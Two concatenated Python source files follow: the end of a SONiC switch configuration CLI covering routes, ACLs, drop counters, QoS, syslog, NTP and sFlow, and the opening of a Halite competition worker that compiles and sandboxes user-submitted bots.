ctx.fail("argument is incomplete, nexthop not found!")
for i in range(0,len(command_str)):
if "nexthop" == command_str[i]:
prefix_str = command_str[:i]
nexthop_str = command_str[i:]
vrf_name = ""
cmd = 'sudo vtysh -c "configure terminal" -c "no ip route'
if prefix_str:
if len(prefix_str) == 2:
prefix_mask = prefix_str[1]
cmd += ' {}'.format(prefix_mask)
elif len(prefix_str) == 4:
vrf_name = prefix_str[2]
prefix_mask = prefix_str[3]
cmd += ' {}'.format(prefix_mask)
else:
ctx.fail("prefix is not in pattern!")
if nexthop_str:
if len(nexthop_str) == 2:
ip = nexthop_str[1]
if vrf_name == "":
cmd += ' {}'.format(ip)
else:
cmd += ' {} vrf {}'.format(ip, vrf_name)
elif len(nexthop_str) == 3:
dev_name = nexthop_str[2]
if vrf_name == "":
cmd += ' {}'.format(dev_name)
else:
cmd += ' {} vrf {}'.format(dev_name, vrf_name)
elif len(nexthop_str) == 4:
vrf_name_dst = nexthop_str[2]
ip = nexthop_str[3]
if vrf_name == "":
cmd += ' {} nexthop-vrf {}'.format(ip, vrf_name_dst)
else:
cmd += ' {} vrf {} nexthop-vrf {}'.format(ip, vrf_name, vrf_name_dst)
else:
ctx.fail("nexthop is not in pattern!")
cmd += '"'
clicommon.run_command(cmd)
#
# 'acl' group ('config acl ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def acl():
"""ACL-related configuration tasks"""
pass
#
# 'add' subgroup ('config acl add ...')
#
@acl.group(cls=clicommon.AbbreviationGroup)
def add():
"""
Add ACL configuration.
"""
pass
def get_acl_bound_ports():
config_db = ConfigDBConnector()
config_db.connect()
ports = set()
portchannel_members = set()
portchannel_member_dict = config_db.get_table("PORTCHANNEL_MEMBER")
for key in portchannel_member_dict:
ports.add(key[0])
portchannel_members.add(key[1])
port_dict = config_db.get_table("PORT")
for key in port_dict:
if key not in portchannel_members:
ports.add(key)
return list(ports)
#
# 'table' subcommand ('config acl add table ...')
#
@add.command()
@click.argument("table_name", metavar="<table_name>")
@click.argument("table_type", metavar="<table_type>")
@click.option("-d", "--description")
@click.option("-p", "--ports")
@click.option("-s", "--stage", type=click.Choice(["ingress", "egress"]), default="ingress")
def table(table_name, table_type, description, ports, stage):
"""
Add ACL table
"""
config_db = ConfigDBConnector()
config_db.connect()
table_info = {"type": table_type}
if description:
table_info["policy_desc"] = description
else:
table_info["policy_desc"] = table_name
if ports:
table_info["ports@"] = ports
else:
table_info["ports@"] = ",".join(get_acl_bound_ports())
table_info["stage"] = stage
config_db.set_entry("ACL_TABLE", table_name, table_info)
#
# 'remove' subgroup ('config acl remove ...')
#
@acl.group(cls=clicommon.AbbreviationGroup)
def remove():
"""
Remove ACL configuration.
"""
pass
#
# 'table' subcommand ('config acl remove table ...')
#
@remove.command()
@click.argument("table_name", metavar="<table_name>")
def table(table_name):
"""
Remove ACL table
"""
config_db = ConfigDBConnector()
config_db.connect()
config_db.set_entry("ACL_TABLE", table_name, None)
#
# 'acl update' group
#
@acl.group(cls=clicommon.AbbreviationGroup)
def update():
"""ACL-related configuration tasks"""
pass
#
# 'full' subcommand
#
@update.command()
@click.argument('file_name', required=True)
def full(file_name):
"""Full update of ACL rules configuration."""
log.log_info("'acl update full {}' executing...".format(file_name))
command = "acl-loader update full {}".format(file_name)
clicommon.run_command(command)
#
# 'incremental' subcommand
#
@update.command()
@click.argument('file_name', required=True)
def incremental(file_name):
"""Incremental update of ACL rule configuration."""
log.log_info("'acl update incremental {}' executing...".format(file_name))
command = "acl-loader update incremental {}".format(file_name)
clicommon.run_command(command)
#
# 'dropcounters' group ('config dropcounters ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def dropcounters():
"""Drop counter related configuration tasks"""
pass
#
# 'install' subcommand ('config dropcounters install')
#
@dropcounters.command()
@click.argument("counter_name", type=str, required=True)
@click.argument("counter_type", type=str, required=True)
@click.argument("reasons", type=str, required=True)
@click.option("-a", "--alias", type=str, help="Alias for this counter")
@click.option("-g", "--group", type=str, help="Group for this counter")
@click.option("-d", "--desc", type=str, help="Description for this counter")
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def install(counter_name, alias, group, counter_type, desc, reasons, verbose):
"""Install a new drop counter"""
command = "dropconfig -c install -n '{}' -t '{}' -r '{}'".format(counter_name, counter_type, reasons)
if alias:
command += " -a '{}'".format(alias)
if group:
command += " -g '{}'".format(group)
if desc:
command += " -d '{}'".format(desc)
clicommon.run_command(command, display_cmd=verbose)
#
# 'delete' subcommand ('config dropcounters delete')
#
@dropcounters.command()
@click.argument("counter_name", type=str, required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def delete(counter_name, verbose):
"""Delete an existing drop counter"""
command = "dropconfig -c uninstall -n {}".format(counter_name)
clicommon.run_command(command, display_cmd=verbose)
#
# 'add_reasons' subcommand ('config dropcounters add_reasons')
#
@dropcounters.command('add-reasons')
@click.argument("counter_name", type=str, required=True)
@click.argument("reasons", type=str, required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def add_reasons(counter_name, reasons, verbose):
"""Add reasons to an existing drop counter"""
command = "dropconfig -c add -n {} -r {}".format(counter_name, reasons)
clicommon.run_command(command, display_cmd=verbose)
#
# 'remove_reasons' subcommand ('config dropcounters remove_reasons')
#
@dropcounters.command('remove-reasons')
@click.argument("counter_name", type=str, required=True)
@click.argument("reasons", type=str, required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def remove_reasons(counter_name, reasons, verbose):
"""Remove reasons from an existing drop counter"""
command = "dropconfig -c remove -n {} -r {}".format(counter_name, reasons)
clicommon.run_command(command, display_cmd=verbose)
#
# 'ecn' command ('config ecn ...')
#
@config.command()
@click.option('-profile', metavar='<profile_name>', type=str, required=True, help="Profile name")
@click.option('-rmax', metavar='<red threshold max>', type=int, help="Set red max threshold")
@click.option('-rmin', metavar='<red threshold min>', type=int, help="Set red min threshold")
@click.option('-ymax', metavar='<yellow threshold max>', type=int, help="Set yellow max threshold")
@click.option('-ymin', metavar='<yellow threshold min>', type=int, help="Set yellow min threshold")
@click.option('-gmax', metavar='<green threshold max>', type=int, help="Set green max threshold")
@click.option('-gmin', metavar='<green threshold min>', type=int, help="Set green min threshold")
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def ecn(profile, rmax, rmin, ymax, ymin, gmax, gmin, verbose):
"""ECN-related configuration tasks"""
log.log_info("'ecn -profile {}' executing...".format(profile))
command = "ecnconfig -p %s" % profile
if rmax is not None: command += " -rmax %d" % rmax
if rmin is not None: command += " -rmin %d" % rmin
if ymax is not None: command += " -ymax %d" % ymax
if ymin is not None: command += " -ymin %d" % ymin
if gmax is not None: command += " -gmax %d" % gmax
if gmin is not None: command += " -gmin %d" % gmin
if verbose: command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
#
# 'pfc' group ('config interface pfc ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def pfc(ctx):
"""Set PFC configuration."""
pass
#
# 'pfc asymmetric' ('config interface pfc asymmetric ...')
#
@pfc.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('status', type=click.Choice(['on', 'off']))
@click.pass_context
def asymmetric(ctx, interface_name, status):
"""Set asymmetric PFC configuration."""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
clicommon.run_command("pfc config asymmetric {0} {1}".format(status, interface_name))
#
# 'pfc priority' command ('config interface pfc priority ...')
#
@pfc.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('priority', type=click.Choice([str(x) for x in range(8)]))
@click.argument('status', type=click.Choice(['on', 'off']))
@click.pass_context
def priority(ctx, interface_name, priority, status):
"""Set PFC priority configuration."""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
clicommon.run_command("pfc config priority {0} {1} {2}".format(status, interface_name, priority))
#
# 'platform' group ('config platform ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def platform():
"""Platform-related configuration tasks"""
# 'firmware' subgroup ("config platform firmware ...")
@platform.group(cls=clicommon.AbbreviationGroup)
def firmware():
"""Firmware configuration tasks"""
pass
# 'install' subcommand ("config platform firmware install")
@firmware.command(
context_settings=dict(
ignore_unknown_options=True,
allow_extra_args=True
),
add_help_option=False
)
@click.argument('args', nargs=-1, type=click.UNPROCESSED)
def install(args):
"""Install platform firmware"""
cmd = "fwutil install {}".format(" ".join(args))
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
sys.exit(e.returncode)
# 'update' subcommand ("config platform firmware update")
@firmware.command(
context_settings=dict(
ignore_unknown_options=True,
allow_extra_args=True
),
add_help_option=False
)
@click.argument('args', nargs=-1, type=click.UNPROCESSED)
def update(args):
"""Update platform firmware"""
cmd = "fwutil update {}".format(" ".join(args))
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
sys.exit(e.returncode)
#
# 'watermark' group ("show watermark telemetry interval")
#
@config.group(cls=clicommon.AbbreviationGroup)
def watermark():
"""Configure watermark """
pass
@watermark.group(cls=clicommon.AbbreviationGroup)
def telemetry():
"""Configure watermark telemetry"""
pass
@telemetry.command()
@click.argument('interval', required=True)
def interval(interval):
"""Configure watermark telemetry interval"""
command = 'watermarkcfg --config-interval ' + interval
clicommon.run_command(command)
#
# 'interface_naming_mode' subgroup ('config interface_naming_mode ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='interface_naming_mode')
def interface_naming_mode():
"""Modify interface naming mode for interacting with SONiC CLI"""
pass
@interface_naming_mode.command('default')
def naming_mode_default():
"""Set CLI interface naming mode to DEFAULT (SONiC port name)"""
set_interface_naming_mode('default')
@interface_naming_mode.command('alias')
def naming_mode_alias():
"""Set CLI interface naming mode to ALIAS (Vendor port alias)"""
set_interface_naming_mode('alias')
@config.group()
def is_loopback_name_valid(loopback_name):
"""Loopback name validation
"""
if loopback_name[:CFG_LOOPBACK_PREFIX_LEN] != CFG_LOOPBACK_PREFIX :
return False
if (loopback_name[CFG_LOOPBACK_PREFIX_LEN:].isdigit() is False or
int(loopback_name[CFG_LOOPBACK_PREFIX_LEN:]) > CFG_LOOPBACK_ID_MAX_VAL) :
return False
if len(loopback_name) > CFG_LOOPBACK_NAME_TOTAL_LEN_MAX:
return False
return True
#
# 'loopback' group ('config loopback ...')
#
@config.group()
@click.pass_context
@click.option('-s', '--redis-unix-socket-path', help='unix socket path for redis connection')
def loopback(ctx, redis_unix_socket_path):
"""Loopback-related configuration tasks"""
kwargs = {}
if redis_unix_socket_path:
kwargs['unix_socket_path'] = redis_unix_socket_path
config_db = ConfigDBConnector(**kwargs)
config_db.connect(wait_for_init=False)
ctx.obj = {'db': config_db}
@loopback.command('add')
@click.argument('loopback_name', metavar='<loopback_name>', required=True)
@click.pass_context
def add_loopback(ctx, loopback_name):
config_db = ctx.obj['db']
if is_loopback_name_valid(loopback_name) is False:
ctx.fail("{} is invalid, name should have prefix '{}' and suffix '{}' "
.format(loopback_name, CFG_LOOPBACK_PREFIX, CFG_LOOPBACK_NO))
lo_intfs = [k for k,v in config_db.get_table('LOOPBACK_INTERFACE').iteritems() if type(k) != tuple]
if loopback_name in lo_intfs:
ctx.fail("{} already exists".format(loopback_name))
config_db.set_entry('LOOPBACK_INTERFACE', loopback_name, {"NULL" : "NULL"})
@loopback.command('del')
@click.argument('loopback_name', metavar='<loopback_name>', required=True)
@click.pass_context
def del_loopback(ctx, loopback_name):
config_db = ctx.obj['db']
if is_loopback_name_valid(loopback_name) is False:
ctx.fail("{} is invalid, name should have prefix '{}' and suffix '{}' "
.format(loopback_name, CFG_LOOPBACK_PREFIX, CFG_LOOPBACK_NO))
lo_config_db = config_db.get_table('LOOPBACK_INTERFACE')
lo_intfs = [k for k,v in lo_config_db.iteritems() if type(k) != tuple]
if loopback_name not in lo_intfs:
ctx.fail("{} does not exists".format(loopback_name))
ips = [ k[1] for k in lo_config_db if type(k) == tuple and k[0] == loopback_name ]
for ip in ips:
config_db.set_entry('LOOPBACK_INTERFACE', (loopback_name, ip), None)
config_db.set_entry('LOOPBACK_INTERFACE', loopback_name, None)
@config.group(cls=clicommon.AbbreviationGroup)
def ztp():
""" Configure Zero Touch Provisioning """
if os.path.isfile('/usr/bin/ztp') is False:
exit("ZTP feature unavailable in this image version")
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
@ztp.command()
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='ZTP will be restarted. You may lose switch data and connectivity, continue?')
@click.argument('run', required=False, type=click.Choice(["run"]))
def run(run):
"""Restart ZTP of the device."""
command = "ztp run -y"
clicommon.run_command(command, display_cmd=True)
@ztp.command()
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Active ZTP session will be stopped and disabled, continue?')
@click.argument('disable', required=False, type=click.Choice(["disable"]))
def disable(disable):
"""Administratively Disable ZTP."""
command = "ztp disable -y"
clicommon.run_command(command, display_cmd=True)
@ztp.command()
@click.argument('enable', required=False, type=click.Choice(["enable"]))
def enable(enable):
"""Administratively Enable ZTP."""
command = "ztp enable"
clicommon.run_command(command, display_cmd=True)
#
# 'syslog' group ('config syslog ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='syslog')
@click.pass_context
def syslog_group(ctx):
"""Syslog server configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@syslog_group.command('add')
@click.argument('syslog_ip_address', metavar='<syslog_ip_address>', required=True)
@click.pass_context
def add_syslog_server(ctx, syslog_ip_address):
""" Add syslog server IP """
if not clicommon.is_ipaddress(syslog_ip_address):
ctx.fail('Invalid ip address')
db = ctx.obj['db']
syslog_servers = db.get_table("SYSLOG_SERVER")
if syslog_ip_address in syslog_servers:
click.echo("Syslog server {} is already configured".format(syslog_ip_address))
return
else:
db.set_entry('SYSLOG_SERVER', syslog_ip_address, {'NULL': 'NULL'})
click.echo("Syslog server {} added to configuration".format(syslog_ip_address))
try:
click.echo("Restarting rsyslog-config service...")
clicommon.run_command("systemctl restart rsyslog-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service rsyslog-config failed with error {}".format(e))
@syslog_group.command('del')
@click.argument('syslog_ip_address', metavar='<syslog_ip_address>', required=True)
@click.pass_context
def del_syslog_server(ctx, syslog_ip_address):
""" Delete syslog server IP """
if not clicommon.is_ipaddress(syslog_ip_address):
ctx.fail('Invalid IP address')
db = ctx.obj['db']
syslog_servers = db.get_table("SYSLOG_SERVER")
if syslog_ip_address in syslog_servers:
db.set_entry('SYSLOG_SERVER', '{}'.format(syslog_ip_address), None)
click.echo("Syslog server {} removed from configuration".format(syslog_ip_address))
else:
ctx.fail("Syslog server {} is not configured.".format(syslog_ip_address))
try:
click.echo("Restarting rsyslog-config service...")
clicommon.run_command("systemctl restart rsyslog-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service rsyslog-config failed with error {}".format(e))
#
# 'ntp' group ('config ntp ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def ntp(ctx):
"""NTP server configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@ntp.command('add')
@click.argument('ntp_ip_address', metavar='<ntp_ip_address>', required=True)
@click.pass_context
def add_ntp_server(ctx, ntp_ip_address):
""" Add NTP server IP """
if not clicommon.is_ipaddress(ntp_ip_address):
ctx.fail('Invalid ip address')
db = ctx.obj['db']
ntp_servers = db.get_table("NTP_SERVER")
if ntp_ip_address in ntp_servers:
click.echo("NTP server {} is already configured".format(ntp_ip_address))
return
else:
db.set_entry('NTP_SERVER', ntp_ip_address, {'NULL': 'NULL'})
click.echo("NTP server {} added to configuration".format(ntp_ip_address))
try:
click.echo("Restarting ntp-config service...")
clicommon.run_command("systemctl restart ntp-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service ntp-config failed with error {}".format(e))
@ntp.command('del')
@click.argument('ntp_ip_address', metavar='<ntp_ip_address>', required=True)
@click.pass_context
def del_ntp_server(ctx, ntp_ip_address):
""" Delete NTP server IP """
if not clicommon.is_ipaddress(ntp_ip_address):
ctx.fail('Invalid IP address')
db = ctx.obj['db']
ntp_servers = db.get_table("NTP_SERVER")
if ntp_ip_address in ntp_servers:
db.set_entry('NTP_SERVER', '{}'.format(ntp_ip_address), None)
click.echo("NTP server {} removed from configuration".format(ntp_ip_address))
else:
ctx.fail("NTP server {} is not configured.".format(ntp_ip_address))
try:
click.echo("Restarting ntp-config service...")
clicommon.run_command("systemctl restart ntp-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service ntp-config failed with error {}".format(e))
#
# 'sflow' group ('config sflow ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def sflow(ctx):
"""sFlow-related configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
#
# 'sflow' command ('config sflow enable')
#
@sflow.command()
@click.pass_context
def enable(ctx):
"""Enable sFlow"""
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'up'}}
else:
sflow_tbl['global']['admin_state'] = 'up'
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
try:
proc = subprocess.Popen("systemctl is-active sflow", shell=True, stdout=subprocess.PIPE)
(out, err) = proc.communicate()
except SystemExit as e:
ctx.fail("Unable to check sflow status {}".format(e))
if out != "active":
log.log_info("sflow service is not enabled. Starting sflow docker...")
clicommon.run_command("sudo systemctl enable sflow")
clicommon.run_command("sudo systemctl start sflow")
#
# 'sflow' command ('config sflow disable')
#
@sflow.command()
@click.pass_context
def disable(ctx):
"""Disable sFlow"""
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
else:
sflow_tbl['global']['admin_state'] = 'down'
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
#
# 'sflow' command ('config sflow polling-interval ...')
#
@sflow.command('polling-interval')
@click.argument('interval', metavar='<polling_interval>', required=True,
type=int)
@click.pass_context
def polling_int(ctx, interval):
"""Set polling-interval for counter-sampling (0 to disable)"""
if interval not in range(5, 301) and interval != 0:
click.echo("Polling interval must be between 5-300 (0 to disable)")
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
sflow_tbl['global']['polling_interval'] = interval
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
def is_valid_sample_rate(rate):
return rate in range(256, 8388608 + 1)
#
# 'sflow interface' group
#
@sflow.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def interface(ctx):
"""Configure sFlow settings for an interface"""
pass
#
# 'sflow' command ('config sflow interface enable ...')
#
@interface.command()
@click.argument('ifname', metavar='<interface_name>', required=True, type=str)
@click.pass_context
def enable(ctx, ifname):
config_db = ctx.obj['db']
if not interface_name_is_valid(config_db, ifname) and ifname != 'all':
click.echo("Invalid interface name")
return
intf_dict = config_db.get_table('SFLOW_SESSION')
if intf_dict and ifname in intf_dict.keys():
intf_dict[ifname]['admin_state'] = 'up'
config_db.mod_entry('SFLOW_SESSION', ifname, intf_dict[ifname])
else:
config_db.mod_entry('SFLOW_SESSION', ifname, {'admin_state': 'up'})
#
# 'sflow' command ('config sflow interface disable ...')
#
@interface.command()
@click.argument('ifname', metavar='<interface_name>', required=True, type=str)
@click.pass_context
def disable(ctx, ifname):
config_db = ctx.obj['db']
if not interface_name_is_valid(config_db, ifname) and ifname != 'all':
click.echo("Invalid interface name")
return
intf_dict = config_db.get_table('SFLOW_SESSION')
if intf_dict and ifname in intf_dict.keys():
intf_dict[ifname]['admin_state'] = 'down'
config_db.mod_entry('SFLOW_SESSION', ifname, intf_dict[ifname])
else:
config_db.mod_entry('SFLOW_SESSION', ifname,
{'admin_state': 'down'})
#
# 'sflow' command ('config sflow interface sample-rate ...')
#
@interface.command('sample-rate')
@click.argument('ifname', metavar='<interface_name>', required=True, type=str)
@click.argument('rate', metavar='<sample_rate>', required=True, type=int)
@click.pass_context
def sample_rate(ctx, ifname, rate):
config_db = ctx.obj['db']
if not interface_name_is_valid(config_db, ifname) and ifname != 'all':
click.echo('Invalid interface name')
return
if not is_valid_sample_rate(rate):
click.echo('Error: Sample rate must be between 256 and 8388608')
return
sess_dict = config_db.get_table('SFLOW_SESSION')
if sess_dict and ifname in sess_dict.keys():
sess_dict[ifname]['sample_rate'] = rate
config_db.mod_entry('SFLOW_SESSION', ifname, sess_dict[ifname])
else:
config_db.mod_entry('SFLOW_SESSION', ifname, {'sample_rate': rate})
#
# 'sflow collector' group
#
@sflow.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def collector(ctx):
"""Add/Delete a sFlow collector"""
pass
def is_valid_collector_info(name, ip, port):
if len(name) > 16:
click.echo("Collector name must not exceed 16 characters")
return False
if port not in range(0, 65535 + 1):
click.echo("Collector port number must be between 0 and 65535")
return False
if not clicommon.is_ipaddress(ip):
click.echo("Invalid IP address")
return False
return True
#
# 'sflow' command ('config sflow collector add ...')
#
@collector.command()
@click.option('--port', required=False, type=int, default=6343,
help='Collector port number')
@click.argument('name', metavar='<collector_name>', required=True)
@click.argument('ipaddr', metavar='<IPv4/v6_address>', required=True)
@click.pass_context
def add(ctx, name, ipaddr, port):
"""Add a sFlow collector"""
ipaddr = ipaddr.lower()
if not is_valid_collector_info(name, ipaddr, port):
return
config_db = ctx.obj['db']
collector_tbl = config_db.get_table('SFLOW_COLLECTOR')
if (collector_tbl and name not in collector_tbl.keys() and len(collector_tbl) == 2):
click.echo("Only 2 collectors can be configured, please delete one")
return
config_db.mod_entry('SFLOW_COLLECTOR', name,
{"collector_ip": ipaddr, "collector_port": port})
return
#
# 'sflow' command ('config sflow collector del ...')
#
@collector.command('del')
@click.argument('name', metavar='<collector_name>', required=True)
@click.pass_context
def del_collector(ctx, name):
"""Delete a sFlow collector"""
config_db = ctx.obj['db']
collector_tbl = config_db.get_table('SFLOW_COLLECTOR')
if name not in collector_tbl.keys():
click.echo("Collector: {} not configured".format(name))
return
config_db.mod_entry('SFLOW_COLLECTOR', name, None)
#
# 'sflow agent-id' group
#
@sflow.group(cls=clicommon.AbbreviationGroup, name='agent-id')
@click.pass_context
def agent_id(ctx):
"""Add/Delete a sFlow agent"""
pass
#
# 'sflow' command ('config sflow agent-id add ...')
#
@agent_id.command()
@click.argument('ifname', metavar='<interface_name>', required=True)
@click.pass_context
def add(ctx, ifname):
"""Add sFlow agent information"""
if ifname not in netifaces.interfaces():
click.echo("Invalid interface name")
return
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
if 'agent_id' in sflow_tbl['global'].keys():
click.echo("Agent already configured. Please delete it first.")
return
sflow_tbl['global']['agent_id'] = ifname
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
#
# 'sflow' command ('config sflow agent-id del')
#
@agent_id.command('del')
@click.pass_context
def delete(ctx):
"""Delete sFlow agent information"""
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
if 'agent_id' not in sflow_tbl['global'].keys():
click.echo("sFlow agent not configured.")
return
sflow_tbl['global'].pop('agent_id')
config_db.set_entry('SFLOW', 'global', sflow_tbl['global'])
if __name__ == '__main__':
config()
|
worker.py
|
import argparse
import copy
import os
import sys
import os.path
import glob
import json
import random
import shutil
import subprocess
import tempfile
import traceback
import logging
import uuid
import socket
from time import sleep, gmtime, strftime
import datetime
import threading
from flask import Flask
import archive
import backend
import compiler
import util
# Flask start
app = Flask(__name__)
# Log it real good
LOG_FILENAME = "worker-log-{}.data".format(uuid.uuid4())
# Constraints on # and size of log files read from bots
MAX_LOG_FILES = 1
MAX_LOG_FILE_SIZE = 50 * 1024 # 50 KiB
# Used to ensure system is running (watchdog timer)
TIME = datetime.datetime.now()
TIME_THRESHOLD = 60 * 18 # 18 mins in s
# Used by Watchdog timer to keep time
LOCK = threading.Lock()
# Where to create temporary directories
TEMP_DIR = os.getcwd()
# The game environment executable.
ENVIRONMENT = "halite"
# The script used to start the bot. This is either user-provided or
# created by compile.py.
RUNFILE = "run.sh"
# The command used to run the bot. On the outside is a cgroup limiting CPU
# and memory access. On the inside, we run the bot as a user so that it may
# not overwrite files. The worker image has a built-in iptables rule denying
# network access to this user as well.
BOT_COMMAND = "cgexec -g cpu,memory,devices,cpuset:{cgroup} sudo -Hiu {bot_user} bash -c 'cd \"{bot_dir}\" && ./{runfile}'"
COMPILE_ERROR_MESSAGE = """
Your bot caused unexpected behavior in our servers. If you cannot figure out
why this happened, please email us at halite@halite.io. We can help.
For our reference, here is the trace of the error:
"""
UPLOAD_ERROR_MESSAGE = """
We had some trouble uploading your bot. If you cannot figure out why
this happened, please email us at halite@halite.io. We can help.
For our reference, here is the trace of the error:
"""
class OndemandCompileError(Exception):
"""
Error for when compilation fails before an ondemand game.
"""
def __init__(self, language, log):
self.language = language
self.log = log
def makePath(path):
"""Deletes anything residing at path, creates path, and chmods the directory"""
if os.path.exists(path):
shutil.rmtree(path)
os.makedirs(path)
os.chmod(path, 0o777)
def give_ownership(top_dir, group, dir_perms):
"""Give ownership of everything in a directory to a given group."""
for dirpath, _, filenames in os.walk(top_dir):
shutil.chown(dirpath, group=group)
os.chmod(dirpath, dir_perms)
for filename in filenames:
shutil.chown(os.path.join(dirpath, filename), group=group)
os.chmod(os.path.join(dirpath, filename), dir_perms)
def rm_as_user(user, directory):
"""Remove a directory tree as the specified user."""
subprocess.call(["sudo", "-H", "-u", user, "-s", "rm", "-rf", directory],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
def executeCompileTask(user_id, bot_id, backend):
"""Downloads and compiles a bot. Posts the compiled bot files to the manager."""
logging.debug("Compiling a bot with userID %s\n" % str(user_id))
errors = []
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as temp_dir:
try:
bot_path = backend.storeBotLocally(user_id, bot_id, temp_dir,
is_compile=True)
archive.unpack(bot_path)
# Make sure things are in the top-level directory
while len([
name for name in os.listdir(temp_dir)
if os.path.isfile(os.path.join(temp_dir, name))
]) == 0 and len(glob.glob(os.path.join(temp_dir, "*"))) == 1:
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as bufferFolder:
singleFolder = glob.glob(os.path.join(temp_dir, "*"))[0]
for filename in os.listdir(singleFolder):
shutil.move(os.path.join(singleFolder, filename), bufferFolder)
os.rmdir(singleFolder)
for filename in os.listdir(bufferFolder):
shutil.move(os.path.join(bufferFolder, filename), temp_dir)
# Context manager takes care of buffer folder
# Delete any symlinks
subprocess.call(["find", temp_dir, "-type", "l", "-delete"])
# Give the compilation user access
os.chmod(temp_dir, 0o755)
# User needs to be able to write to the directory
give_ownership(temp_dir, "bots", 0o774)
# Reset cwd before compilation, in case it was in a
# deleted temporary folder
os.chdir(os.path.dirname(os.path.realpath(sys.argv[0])))
language, more_errors = compiler.compile_anything(temp_dir)
didCompile = more_errors is None
if more_errors:
errors.extend(more_errors)
except Exception:
language = "Other"
errors = [COMPILE_ERROR_MESSAGE + traceback.format_exc()] + errors
didCompile = False
try:
if didCompile:
logging.debug("Bot did compile\n")
archive_path = os.path.join(temp_dir, str(user_id)+".zip")
archive.zipFolder(temp_dir, archive_path)
backend.storeBotRemotely(user_id, bot_id, archive_path)
else:
logging.debug("Bot did not compile\n")
logging.debug("Bot errors %s\n" % str(errors))
backend.compileResult(user_id, bot_id, didCompile, language,
errors=(None if didCompile else "\n".join(errors)))
except:
logging.debug("Bot did not upload\n")
traceback.print_exc()
errors.append(UPLOAD_ERROR_MESSAGE + traceback.format_exc())
backend.compileResult(user_id, bot_id, False, language,
errors="\n".join(errors))
finally:
# Remove files as bot user (Python will clean up tempdir, but we don't
# necessarily have permissions to clean up files)
rm_as_user("bot_compilation", temp_dir)
def setupParticipant(user_index, user, temp_dir):
"""
Download and set up the bot for a game participant.
"""
# Include username to deal with duplicate bots
bot_dir = "{}_{}_{}".format(user["user_id"], user["bot_id"], user["username"])
bot_dir = os.path.join(temp_dir, bot_dir)
os.mkdir(bot_dir)
archive.unpack(backend.storeBotLocally(user["user_id"],
user["bot_id"], bot_dir))
if user.get("requires_compilation"):
compile_dir = bot_dir + '_compile'
try:
# Move to temp directory to avoid permission problems
# (can't chown files created by compile user back to us)
shutil.move(bot_dir, compile_dir)
# Give the compilation user access
os.chmod(compile_dir, 0o2755)
# User needs to be able to write to the directory
give_ownership(compile_dir, "bots", 0o2774)
language, errors = compiler.compile_anything(compile_dir)
didCompile = errors is None
except Exception:
language = "Other"
errors = [COMPILE_ERROR_MESSAGE + traceback.format_exc()] + errors
didCompile = False
if not didCompile:
# Abort and upload an error log
rm_as_user("bot_compilation", compile_dir)
raise OndemandCompileError(language, '\n'.join(errors))
# Move back to original directory
try:
shutil.copytree(compile_dir, bot_dir)
except shutil.Error as e:
print(e)
rm_as_user("bot_compilation", compile_dir)
# Make the start script executable
os.chmod(os.path.join(bot_dir, RUNFILE), 0o755)
# Give the bot user ownership of their directory
# We should set up each user's default group as a group that the
# worker is also a part of. Then we always have access to their
# files, but not vice versa.
# https://superuser.com/questions/102253/how-to-make-files-created-in-a-directory-owned-by-directory-group
bot_user = "bot_{}".format(user_index)
